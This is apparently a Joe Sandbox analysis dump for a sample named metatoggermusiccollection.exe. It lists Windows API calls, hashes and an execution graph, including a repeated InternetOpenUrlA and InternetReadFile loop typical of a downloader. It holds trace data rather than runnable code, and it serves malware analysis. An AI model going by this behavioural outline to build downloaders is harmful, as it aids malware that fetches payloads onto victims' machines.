                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                            • API String ID: 2238633743-4044615076
                                                                            • Opcode ID: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                            • Instruction ID: 8e14f7a6750b1570260f033f2342e22bcd7c780a38ad1719db35514165c9b09a
                                                                            • Opcode Fuzzy Hash: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                            • Instruction Fuzzy Hash: 9F015232600701AFDB11EFB5AD80A1B3BE8EB45740315043AB909F2591D678D8359F69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
                                                                            • LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
                                                                            • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
                                                                            • LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: String$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 352835431-0
                                                                            • Opcode ID: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                            • Instruction ID: 228655485731442308ac41690fb54a5bf4aece3cc6a962a44786cceaeb1d8e11
                                                                            • Opcode Fuzzy Hash: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                            • Instruction Fuzzy Hash: 94518931504609AFDF228F55CD45EAF7FB9EB48744F20412AF912B12A0D3398D21DF69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
                                                                            • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
                                                                            • WriteFile.KERNEL32(00000000), ref: 00404D43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandleModuleNameWrite
                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                            • API String ID: 3784150691-4022980321
                                                                            • Opcode ID: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                            • Instruction ID: f140c2e8ca9dd112070b7b1a63e93dd9695d020ae797257d07982e8dddccbb03
                                                                            • Opcode Fuzzy Hash: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                            • Instruction Fuzzy Hash: 5531E5B2A012186FEF20E760DE49FDA336CEF85304F1005BBF945B61D0D6B89E548A19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1823725401-0
                                                                            • Opcode ID: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                            • Instruction ID: 34ba4f5269201e1e594d4a21fe80140370f79d481ab45775fabf70a7e665ef6c
                                                                            • Opcode Fuzzy Hash: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                            • Instruction Fuzzy Hash: E631C2F75042656FD7207FB99D8483BB69CE6C6358716093BFB42F3280D7798C4182AA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                            • GetLastError.KERNEL32 ref: 00401F86
                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                            • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                            • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                            • GetTickCount.KERNEL32 ref: 00401FFB
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                            • String ID:
                                                                            • API String ID: 564119183-0
                                                                            • Opcode ID: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                            • Instruction ID: cd0a89f7906a11fa59f7c630caffefac6273cd55dd9fd3e2fc017d6917677aa9
                                                                            • Opcode Fuzzy Hash: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                            • Instruction Fuzzy Hash: DB312971A40251AFDB109FB99E489AF7B78EF49344B10807AFA46F7281D6748941C7A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
                                                                            • MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: StringType$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 3852931651-0
                                                                            • Opcode ID: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                            • Instruction ID: 80e02ee10c910d5558e83bb499fc0990029bfad3b9a08e1f349c60d3d592f295
                                                                            • Opcode Fuzzy Hash: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                            • Instruction Fuzzy Hash: D5416C72540619AFCF109FA4DD85AAF3F69FB08710F10443AF912F6290C3399A619BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetVersionExA.KERNEL32 ref: 00403131
                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                            • API String ID: 1385375860-4131005785
                                                                            • Opcode ID: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                            • Instruction ID: 15aa791d7551e4111e6245bb3a1b8270ecaa7052e860947edacf4d8c3684a0cc
                                                                            • Opcode Fuzzy Hash: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                            • Instruction Fuzzy Hash: 9C3102719412486DEB31AB706C45BDA7F6C9B0A709F2404FFD145FA2C2D6398F898B19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 0040489B
                                                                            • GetFileType.KERNEL32(00000800), ref: 00404941
                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
                                                                            • GetFileType.KERNEL32(00000000), ref: 004049A8
                                                                            • SetHandleCount.KERNEL32 ref: 004049DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleType$CountInfoStartup
                                                                            • String ID:
                                                                            • API String ID: 1710529072-0
                                                                            • Opcode ID: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                            • Instruction ID: 5bba43567eb9c7eebad7166e054eef6f33a3e935d61c9f19950f113686a4cc82
                                                                            • Opcode Fuzzy Hash: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                            • Instruction Fuzzy Hash: 585124F25003118BD7208B38CD48B673BA0EB91331F19873AE696BB2E1D738C855875A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual$FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 714016831-0
                                                                            • Opcode ID: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                            • Instruction ID: 29c7c306398b504596bf767bafbbf3f0594b5aced9f79ae4ff8fd419923c464c
                                                                            • Opcode Fuzzy Hash: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                            • Instruction Fuzzy Hash: 6831F071A447019BE3208F24DD45B22BFB8EB44B5AF10813AE566BB3D1E778B9008B5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Info
                                                                            • String ID: $
                                                                            • API String ID: 1807457897-3032137957
                                                                            • Opcode ID: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                            • Instruction ID: 09f2f023d99f136d6c1d54f1ac7197ff319f79a86c6e1a8e0271cc1bcc75f35e
                                                                            • Opcode Fuzzy Hash: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                            • Instruction Fuzzy Hash: 474156310047586AEB15D614DE5DBFB7FA9EB02700F1400F6E946F71D2C2790924DFAA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe,00000104,?,00000000,?,?,?,?,00402FB0), ref: 004044E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleName
                                                                            • String ID: 6i$C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                            • API String ID: 514040917-2770887855
                                                                            • Opcode ID: e4c2509f1a48c11c220fc4324a28902978b1387e4841e844e69e582ca8f90123
                                                                            • Instruction ID: a353362e766ed3f2c716cac6d89b577610a1520323eec6d1a1738d9fa524379f
                                                                            • Opcode Fuzzy Hash: e4c2509f1a48c11c220fc4324a28902978b1387e4841e844e69e582ca8f90123
                                                                            • Instruction Fuzzy Hash: B2115EB2900218BFD711EF99DD81CAB77BCEB45358B1100BBF605B3241E674AE148BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AllocHeap$FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 3499195154-0
                                                                            • Opcode ID: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                            • Instruction ID: ab7933d84ada2b962503ad88361c81f9e178ef349f2d38840b4e325d6782f2f4
                                                                            • Opcode Fuzzy Hash: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                            • Instruction Fuzzy Hash: 3E118F712003019FD7218F29EE459167BF5FB84765711853AF152E71B0C372D961CF1A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:9.1%
                                                                            Dynamic/Decrypted Code Coverage:83.9%
                                                                            Signature Coverage:2.5%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:40
19863 402d5c GetVersionExA 19862->19863 19863->19842 19863->19843 19869 404d63 19864->19869 19868 4030fc 19867->19868 19868->19846 19871 404d7b 19869->19871 19872 404dab 19871->19872 19876 405aaa 19871->19876 19873 405aaa 6 API calls 19872->19873 19875 404d5f 19872->19875 19880 4059de 19872->19880 19873->19872 19875->19844 19877 405ac8 19876->19877 19878 405abc 19876->19878 19886 405d6e 19877->19886 19878->19871 19881 405a09 19880->19881 19885 4059ec 19880->19885 19882 405a25 19881->19882 19883 405aaa 6 API calls 19881->19883 19882->19885 19898 405b1f 19882->19898 19883->19882 19885->19872 19887 405db7 19886->19887 19888 405d9f GetStringTypeW 19886->19888 19890 405de2 GetStringTypeA 19887->19890 19891 405e06 19887->19891 19888->19887 19889 405dbb GetStringTypeA 19888->19889 19889->19887 19892 405ea3 19889->19892 19890->19892 19891->19892 19894 405e1c MultiByteToWideChar 19891->19894 19892->19878 19894->19892 19895 405e40 19894->19895 19895->19892 19896 405e7a MultiByteToWideChar 19895->19896 19896->19892 19897 405e93 GetStringTypeW 19896->19897 19897->19892 19899 405b6b 19898->19899 19900 405b4f LCMapStringW 19898->19900 19903 405bd1 19899->19903 19904 405bb4 LCMapStringA 19899->19904 19900->19899 19901 405b73 LCMapStringA 19900->19901 19901->19899 19902 405cad 19901->19902 19902->19885 19903->19902 19905 405be7 MultiByteToWideChar 19903->19905 19904->19902 19905->19902 19906 405c11 19905->19906 19906->19902 19907 405c47 MultiByteToWideChar 19906->19907 19907->19902 19908 405c60 LCMapStringW 19907->19908 19908->19902 19909 405c7b 19908->19909 19910 405c81 19909->19910 19912 405cc1 19909->19912 19910->19902 19911 405c8f LCMapStringW 19910->19911 19911->19902 19912->19902 19913 405cf9 LCMapStringW 19912->19913 19913->19902 19914 405d11 WideCharToMultiByte 19913->19914 19914->19902 19925 402e82 19916->19925 19919 403018 19920 403021 19919->19920 19921 403026 19919->19921 19962 404bc0 19920->19962 19968 404bf9 19921->19968 19926 402e7f 19925->19926 19928 402e89 
19925->19928 19926->19766 19926->19919 19928->19926 19929 402eae 19928->19929 19930 402ebd 19929->19930 19932 402ed2 19929->19932 19937 402ecb 19930->19937 19938 403653 19930->19938 19933 402f11 HeapAlloc 19932->19933 19932->19937 19944 403e00 19932->19944 19934 402f20 19933->19934 19934->19928 19935 402ed0 19935->19928 19937->19933 19937->19934 19937->19935 19939 403685 19938->19939 19940 403724 19939->19940 19942 403733 19939->19942 19951 40395c 19939->19951 19940->19942 19958 403a0d 19940->19958 19942->19937 19949 403e0e 19944->19949 19945 403efa VirtualAlloc 19950 403ecb 19945->19950 19946 403fcf 19947 403b08 5 API calls 19946->19947 19947->19950 19949->19945 19949->19946 19949->19950 19950->19937 19952 40399f HeapAlloc 19951->19952 19953 40396f HeapReAlloc 19951->19953 19955 4039ef 19952->19955 19956 4039c5 VirtualAlloc 19952->19956 19954 40398e 19953->19954 19953->19955 19954->19952 19955->19940 19956->19955 19957 4039df HeapFree 19956->19957 19957->19955 19959 403a1f VirtualAlloc 19958->19959 19961 403a68 19959->19961 19961->19942 19964 404bca 19962->19964 19963 404bf7 19963->19921 19964->19963 19965 404bf9 7 API calls 19964->19965 19966 404be1 19965->19966 19967 404bf9 7 API calls 19966->19967 19967->19963 19970 404c0c 19968->19970 19969 404d23 19972 404d36 GetStdHandle WriteFile 19969->19972 19970->19969 19971 404c4c 19970->19971 19976 40302f 19970->19976 19973 404c58 GetModuleFileNameA 19971->19973 19971->19976 19972->19976 19974 404c70 19973->19974 19977 405857 19974->19977 19976->19766 19978 405864 LoadLibraryA 19977->19978 19980 4058a6 19977->19980 19979 405875 GetProcAddress 19978->19979 19978->19980 19979->19980 19981 40588c GetProcAddress GetProcAddress 19979->19981 19980->19976 19981->19980 19983 403089 19982->19983 19984 40306d 19982->19984 19983->19797 19985 403077 19984->19985 19986 40308d 19984->19986 19988 4030b9 HeapFree 19985->19988 19989 403083 19985->19989 19987 4030b8 19986->19987 19991 4030a7 19986->19991 19987->19988 19988->19983 19993 
40332a 19989->19993 19999 403dbb 19991->19999 19995 403368 19993->19995 19998 40361e 19993->19998 19994 403564 VirtualFree 19996 4035c8 19994->19996 19995->19994 19995->19998 19997 4035d7 VirtualFree HeapFree 19996->19997 19996->19998 19997->19998 19998->19983 20000 403de8 19999->20000 20001 403dfe 19999->20001 20000->20001 20003 403ca2 20000->20003 20001->19983 20006 403caf 20003->20006 20004 403d5f 20004->20001 20005 403cd0 VirtualFree 20005->20006 20006->20004 20006->20005 20008 403c4c VirtualFree 20006->20008 20009 403c69 20008->20009 20010 403c99 20009->20010 20011 403c79 HeapFree 20009->20011 20010->20006 20011->20006 20013 405844 20012->20013 20015 40584b 20012->20015 20016 405477 20013->20016 20015->19802 20023 405610 20016->20023 20020 4054ba GetCPInfo 20022 4054ce 20020->20022 20021 405604 20021->20015 20022->20021 20028 4056b6 GetCPInfo 20022->20028 20024 405630 20023->20024 20025 405620 GetOEMCP 20023->20025 20026 405488 20024->20026 20027 405635 GetACP 20024->20027 20025->20024 20026->20020 20026->20021 20026->20022 20027->20026 20029 4057a1 20028->20029 20030 4056d9 20028->20030 20029->20021 20031 405d6e 6 API calls 20030->20031 20032 405755 20031->20032 20033 405b1f 9 API calls 20032->20033 20034 405779 20033->20034 20035 405b1f 9 API calls 20034->20035 20035->20029 20037 404187 GetCurrentProcess TerminateProcess 20036->20037 20038 404198 20036->20038 20037->20038 20039 402ff9 20038->20039 20040 404202 ExitProcess 20038->20040 20039->19835 20041 402223 20043 40b055 20041->20043 20042 4022ba 20043->20042 20045 401f64 FindResourceA 20043->20045 20046 401f86 GetLastError SizeofResource 20045->20046 20047 401f9f 20045->20047 20046->20047 20048 401fa6 LoadResource LockResource GlobalAlloc 20046->20048 20047->20042 20049 401fd2 20048->20049 20050 401ffb GetTickCount 20049->20050 20052 402005 GlobalAlloc 20050->20052 20052->20047 20053 2b3a835 20054 2b3e3b9 20053->20054 20056 2ae2eec 59 API calls 20054->20056 20055 2b3e3be 20057 2ae2eec 59 API calls 
20055->20057 20056->20055 20057->20055 20058 2ad72a7 InternetOpenA 20059 2ad72c5 InternetSetOptionA InternetSetOptionA InternetSetOptionA 20058->20059 20093 2ad66f0 _memset shared_ptr 20058->20093 20065 2ad733e _memset 20059->20065 20060 2ad731e InternetOpenUrlA 20061 2ad737e InternetCloseHandle 20060->20061 20060->20065 20061->20093 20062 2ad6704 Sleep 20064 2ad670a RtlEnterCriticalSection RtlLeaveCriticalSection 20062->20064 20063 2ad7342 InternetReadFile 20063->20065 20066 2ad7373 InternetCloseHandle 20063->20066 20064->20093 20065->20060 20065->20063 20066->20061 20067 2ad73e5 RtlEnterCriticalSection RtlLeaveCriticalSection 20169 2ae227c 20067->20169 20069 2ae227c 66 API calls 20069->20093 20070 2ae2eec _malloc 59 API calls 20071 2ad7499 RtlEnterCriticalSection RtlLeaveCriticalSection 20070->20071 20071->20093 20072 2ad7766 RtlEnterCriticalSection RtlLeaveCriticalSection 20072->20093 20074 2ae2eec 59 API calls _malloc 20074->20093 20077 2ad78de RtlEnterCriticalSection 20078 2ad790b RtlLeaveCriticalSection 20077->20078 20077->20093 20229 2ad3c67 20078->20229 20083 2ae2eb4 59 API calls _free 20083->20093 20085 2ada658 73 API calls 20085->20093 20092 2ae3529 60 API calls _strtok 20092->20093 20093->20058 20093->20062 20093->20064 20093->20067 20093->20069 20093->20070 20093->20072 20093->20074 20093->20077 20093->20078 20093->20083 20093->20085 20093->20092 20093->20093 20097 2ad76e8 Sleep 20093->20097 20098 2ad76e3 shared_ptr 20093->20098 20101 2ad5119 20093->20101 20130 2adab42 20093->20130 20140 2ad61f1 20093->20140 20143 2ad826e 20093->20143 20149 2add04a 20093->20149 20154 2ad831d 20093->20154 20162 2ad33b2 20093->20162 20179 2ae2790 20093->20179 20182 2ae3a8f 20093->20182 20190 2ad966a 20093->20190 20197 2ada782 20093->20197 20205 2ad4100 20093->20205 20209 2ae2358 20093->20209 20220 2ad1ba7 20093->20220 20236 2ad3d7e 20093->20236 20243 2ad8f36 20093->20243 20250 2ad534d 20093->20250 20201 2ae1830 20097->20201 20098->20097 20102 2ad5123 __EH_prolog 
20101->20102 20260 2ae0a50 20102->20260 20105 2ad3c67 72 API calls 20106 2ad514a 20105->20106 20107 2ad3d7e 64 API calls 20106->20107 20108 2ad5158 20107->20108 20109 2ad826e 89 API calls 20108->20109 20110 2ad516c 20109->20110 20111 2ad5322 shared_ptr 20110->20111 20264 2ada658 20110->20264 20111->20093 20114 2ad51c4 20116 2ada658 73 API calls 20114->20116 20115 2ad51f6 20117 2ada658 73 API calls 20115->20117 20119 2ad51d4 20116->20119 20118 2ad5207 20117->20118 20118->20111 20120 2ada658 73 API calls 20118->20120 20119->20111 20122 2ada658 73 API calls 20119->20122 20121 2ad524a 20120->20121 20121->20111 20124 2ada658 73 API calls 20121->20124 20123 2ad52b4 20122->20123 20123->20111 20125 2ada658 73 API calls 20123->20125 20124->20119 20126 2ad52da 20125->20126 20126->20111 20127 2ada658 73 API calls 20126->20127 20128 2ad5304 20127->20128 20269 2adce0c 20128->20269 20131 2adab4c __EH_prolog 20130->20131 20320 2add021 20131->20320 20133 2adab6d shared_ptr 20323 2ae2030 20133->20323 20135 2adab84 20136 2adab9a 20135->20136 20329 2ad3fb0 20135->20329 20136->20093 20141 2ae2eec _malloc 59 API calls 20140->20141 20142 2ad6204 20141->20142 20144 2ad8286 20143->20144 20145 2ad82a7 20143->20145 20775 2ad9530 20144->20775 20148 2ad82cc 20145->20148 20778 2ad2ac7 20145->20778 20148->20093 20150 2ae0a50 Mailbox 68 API calls 20149->20150 20152 2add060 20150->20152 20151 2add14e 20151->20093 20152->20151 20153 2ad2db5 73 API calls 20152->20153 20153->20152 20155 2ad8338 WSASetLastError shutdown 20154->20155 20156 2ad8328 20154->20156 20158 2ada43c 69 API calls 20155->20158 20157 2ae0a50 Mailbox 68 API calls 20156->20157 20161 2ad832d 20157->20161 20159 2ad8355 20158->20159 20160 2ae0a50 Mailbox 68 API calls 20159->20160 20159->20161 20160->20161 20161->20093 20163 2ad33c4 InterlockedCompareExchange 20162->20163 20164 2ad33e1 20162->20164 20163->20164 20165 2ad33d6 20163->20165 20166 2ad29ee 76 API calls 20164->20166 20872 2ad32ab 20165->20872 20168 2ad33f1 20166->20168 
